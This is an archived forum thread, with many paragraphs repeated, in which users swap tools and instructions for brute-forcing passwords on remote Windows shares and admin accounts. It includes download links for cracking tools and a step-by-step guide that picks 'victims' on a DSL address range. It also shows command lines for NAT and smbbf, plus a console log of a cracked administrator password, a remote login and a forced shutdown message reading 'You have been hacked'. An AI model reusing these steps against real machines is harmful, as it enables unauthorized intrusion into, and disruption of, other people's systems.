Hi friends
I am looking for a handy tool to find out the passwords of shared folders in a remote Windows 2000 server.. Any friends could give me a hand please?
Manu
Full Version: Any Tools To Hack Windows 2000 Share Passwords
I got one that uses a dictionary file to crack the IPC$ share. Don't know of anything to brute force it though mate. There must be something out there though. I've heard of many worms using this method. I attached ipccrack.exe if you want it anyway.
Doesn't NAT [Netbios Auditing Tool] do that?
Yeah I think NAT.exe doea it but where is it?
You can get a Unix and Windows variant here along with other tools-
http://www.cotse.com/tools/netbios.htm
OR-
http://www.astalavista.com/tools/auditing/...ecurityscanner/
OR-
http://www.securityfocus.com/tools/543
http://www.cotse.com/tools/netbios.htm
OR-
http://www.astalavista.com/tools/auditing/...ecurityscanner/
OR-
http://www.securityfocus.com/tools/543
Thanks v much.
Found a program called Brutus.
Lets you use user lists and pas lists as well as a built in brute force option.
I've only tried it against 2 of our machines one running NT the other 2000.
On both I just get disconnected when trying to force the admin password over SMB.
I'm working on it,if anyone else wants to try its available at:
www.hoobie.net
Also take a look at www.madirish.net
This guys cool and very free with knowledge.
And one more thing, anyone know somewhere to go for updated password & user lists?
Cheers
Lets you use user lists and pas lists as well as a built in brute force option.
I've only tried it against 2 of our machines one running NT the other 2000.
On both I just get disconnected when trying to force the admin password over SMB.
I'm working on it,if anyone else wants to try its available at:
www.hoobie.net
Also take a look at www.madirish.net
This guys cool and very free with knowledge.
And one more thing, anyone know somewhere to go for updated password & user lists?
Cheers
But a bruteforce attack on a remote machine, that could take years.
Because the password-checking speed will probably be about 1pass/2seconds.
Because the password-checking speed will probably be about 1pass/2seconds.
So whats the simplest way to go about it?
lophtcrack it
I believe NAT is supposed to be the fastest out there for cracking shares.It's so fast i think it can crash the victims machine.
edit: didnt notice it said 2k server ... but this info is good for 9x/me 
Windows 95, 98, and Millenium have a vulnerability that will allow you to crack the passwords to these shares with amazing speed and without the need of brute forcing. For more information about this, you can read about it http://www.securiteam.com/exploits/5WP010K4UA.html . Go to Start / Run or Windows key R and type command. (cmd if you have Windows NT or 2000) When a command prompt opens up type nbtstat -a ipaddress. Make sure to put the spaces inbetween the commands. You should get output that looks like this:
Local Area Connection:
Node IpAddress: [4.3.37.XXX] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
MATRIX <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
MATRIX <20> UNIQUE Registered
MATRIX <03> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
ADMINISTRATOR <03> UNIQUE Registered
WORKGROUP <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MATRIX <6A> UNIQUE Registered
MATRIX <87> UNIQUE Registered
MAC Address = 00-80-C6-F9-X-X
The very first name is the NetBIOS name (MATRIX) and the sixth name is the current user on that computer. That could used for other hacking reasons...possibly brute forcing, but that is a diffrent lesson. Important! Remember the NetBIOS name because you will need that to crack the share password.
Download a copy of PQwak and open it up. http://www.illmob.org/files/pqwak.zip
- Where it says NBNAME pug the NetBIOS name that you acquired from nbtstat.
- Put the share name where it says SHARE. The share name is the name of the folder that is password protected.
- Put the IP of your victim where it says IP. Example 4.3.57.153. I am using the 4.x.x.x subnet because it is full of DSL users that are always online.
- The delay should be set accordingly depending on your connection speed. If your connection is a 56K dialup then I HIGHLY recommend your delay be approx. 1000 - 2000. If your connection is standard ADSL then I recommend you set the delay to 800-900.
Windows 95, 98, and Millenium have a vulnerability that will allow you to crack the passwords to these shares with amazing speed and without the need of brute forcing. For more information about this, you can read about it http://www.securiteam.com/exploits/5WP010K4UA.html . Go to Start / Run or Windows key R and type command. (cmd if you have Windows NT or 2000) When a command prompt opens up type nbtstat -a ipaddress. Make sure to put the spaces inbetween the commands. You should get output that looks like this:
Local Area Connection:
Node IpAddress: [4.3.37.XXX] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
MATRIX <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
MATRIX <20> UNIQUE Registered
MATRIX <03> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
ADMINISTRATOR <03> UNIQUE Registered
WORKGROUP <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MATRIX <6A> UNIQUE Registered
MATRIX <87> UNIQUE Registered
MAC Address = 00-80-C6-F9-X-X
The very first name is the NetBIOS name (MATRIX) and the sixth name is the current user on that computer. That could used for other hacking reasons...possibly brute forcing, but that is a diffrent lesson. Important! Remember the NetBIOS name because you will need that to crack the share password.
Download a copy of PQwak and open it up. http://www.illmob.org/files/pqwak.zip
- Where it says NBNAME pug the NetBIOS name that you acquired from nbtstat.
- Put the share name where it says SHARE. The share name is the name of the folder that is password protected.
- Put the IP of your victim where it says IP. Example 4.3.57.153. I am using the 4.x.x.x subnet because it is full of DSL users that are always online.
- The delay should be set accordingly depending on your connection speed. If your connection is a 56K dialup then I HIGHLY recommend your delay be approx. 1000 - 2000. If your connection is standard ADSL then I recommend you set the delay to 800-900.
I'm looking for an brute-forcer for the IPC$-release ,too. I tested the "Essential Net Tools". It is a great tool, bur if the pw list is too large, it hangs up :/
I wanted to use NAT...but I have some problems:
I use it like this:
nat -o output.txt -u userlist.txt -p passlist.txt target
I think nat tries to connect over the IPC$-release to the target and brute-forces the correct pw for the existing account from userlist.txt
But it doesn't. It reads out the netbios nametables and tries to connect. Then there are lines I don't understand:
(nat.exe 1000) frame 5: sp = 0x245F00C, pc = 0x410492
(nat.exe 1000) frame 6: sp = 0x245F028, pc = 0x407EFA
(nat.exe 1000) frame 7: sp = 0x245F4D0, pc = 0x40A619
...
after this it is over. It only takes a few seconds, but no password from my passlist.txt was tried with one of the username by nat??
What's wrong??
I wanted to use NAT...but I have some problems:
I use it like this:
nat -o output.txt -u userlist.txt -p passlist.txt target
I think nat tries to connect over the IPC$-release to the target and brute-forces the correct pw for the existing account from userlist.txt
But it doesn't. It reads out the netbios nametables and tries to connect. Then there are lines I don't understand:
(nat.exe 1000) frame 5: sp = 0x245F00C, pc = 0x410492
(nat.exe 1000) frame 6: sp = 0x245F028, pc = 0x407EFA
(nat.exe 1000) frame 7: sp = 0x245F4D0, pc = 0x40A619
...
after this it is over. It only takes a few seconds, but no password from my passlist.txt was tried with one of the username by nat??
What's wrong??
I heard that the fastest was SMBAT, samba auditing tools
hxxp://www.cqure.net/tools.jsp?id=01
It often gives me some trouble, just be sure you include the hostname and IP, i dunno why, heres a sample of how i audited a computer here at my house
So it does work, thats actual cmd prompt, un-edited. I dunno if its the same as NB auditing tools, but it doesnt appear to be the same, this one seems to go much faster than it.
hxxp://www.cqure.net/tools.jsp?id=01
QUOTE
The SMB Auditing Tool is a password auditing tool for the Windows-and
the SMB-platform. It makes it possible to exploit the timeout
architecture bug in Windows 2000/XP, making it extremly fast to guess
passwords on these platforms. Running a large password file against
Windows 2000/XP, shows statistics up to 1200 logins/sec. This means
that you could run a commonly used English dictionary with 53 000
words against a server under a minute.
Features
-----------
* Scan hosts for active SMB servers (ie. not only if port is open)
* Automatic enumeration of users
* Support for full automatic mode
* Fast analysis of Windows 2000/XP servers
* Support for SMB over Netbios
* Support for native SMB over port 445
* Compiles on Linux/BSD
* Win32 support with Cygwin
News in version 1.0.4
---------------------------
* Bugfixes
* Added smbserverscan tool. This tool scans ports 139 and 445 for
*active* SMB server.
* Added timeout to most tools, so that they will *not* "hang"
scanning firewalled hosts.
the SMB-platform. It makes it possible to exploit the timeout
architecture bug in Windows 2000/XP, making it extremly fast to guess
passwords on these platforms. Running a large password file against
Windows 2000/XP, shows statistics up to 1200 logins/sec. This means
that you could run a commonly used English dictionary with 53 000
words against a server under a minute.
Features
-----------
* Scan hosts for active SMB servers (ie. not only if port is open)
* Automatic enumeration of users
* Support for full automatic mode
* Fast analysis of Windows 2000/XP servers
* Support for SMB over Netbios
* Support for native SMB over port 445
* Compiles on Linux/BSD
* Win32 support with Cygwin
News in version 1.0.4
---------------------------
* Bugfixes
* Added smbserverscan tool. This tool scans ports 139 and 445 for
*active* SMB server.
* Added timeout to most tools, so that they will *not* "hang"
scanning firewalled hosts.
It often gives me some trouble, just be sure you include the hostname and IP, i dunno why, heres a sample of how i audited a computer here at my house
QUOTE
C:\smb>smbbf -i192.168.0.2 -u c:\smb\username.txt -p c:\smb\pass.txt -g
INFO: Could not determine server name ...
-- Starting password analysis on 192.168.0.2 --
User: ADMINISTRATOR Password: admin
-- Password Statistics --
Total tries 16 in 0.06 seconds
Tries per second = 266.67
Total accounts 4, compromised 1, disabled 0
Penetration ratio = 25.00 %
C:\smb>net use \\192.168.0.2 /user:administrator
The password or user name is invalid for \\192.168.0.2.
Enter the password for 'administrator' to connect to '192.168.0.2':
The command completed successfully.
C:\smb>shutdown -s -f -m \\192.168.0.2 -t 05 -c "You have been hacked"
C:\smb>
INFO: Could not determine server name ...
-- Starting password analysis on 192.168.0.2 --
User: ADMINISTRATOR Password: admin
-- Password Statistics --
Total tries 16 in 0.06 seconds
Tries per second = 266.67
Total accounts 4, compromised 1, disabled 0
Penetration ratio = 25.00 %
C:\smb>net use \\192.168.0.2 /user:administrator
The password or user name is invalid for \\192.168.0.2.
Enter the password for 'administrator' to connect to '192.168.0.2':
The command completed successfully.
C:\smb>shutdown -s -f -m \\192.168.0.2 -t 05 -c "You have been hacked"
C:\smb>
So it does work, thats actual cmd prompt, un-edited. I dunno if its the same as NB auditing tools, but it doesnt appear to be the same, this one seems to go much faster than it.
What can i also do, if i got ipc$ connected as Administrator ?
are the some ways to upload files, like DAMEWARE do ?
if so, how does it work ?...
are the some ways to upload files, like DAMEWARE do ?
if so, how does it work ?...
yes exellent but at my home this tool didn't share :s
Hoping to not lose face here.....but has anyone else come across this...
when using the SMB Auditing tool v1.0.4 get an SMBNTCreateAndX error which I think may be the reason why after the prog has run, and usccessfully compromised an account, the compromised account and pass are not displayed, same applies with outputing the results to file.
when using the SMB Auditing tool v1.0.4 get an SMBNTCreateAndX error which I think may be the reason why after the prog has run, and usccessfully compromised an account, the compromised account and pass are not displayed, same applies with outputing the results to file.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
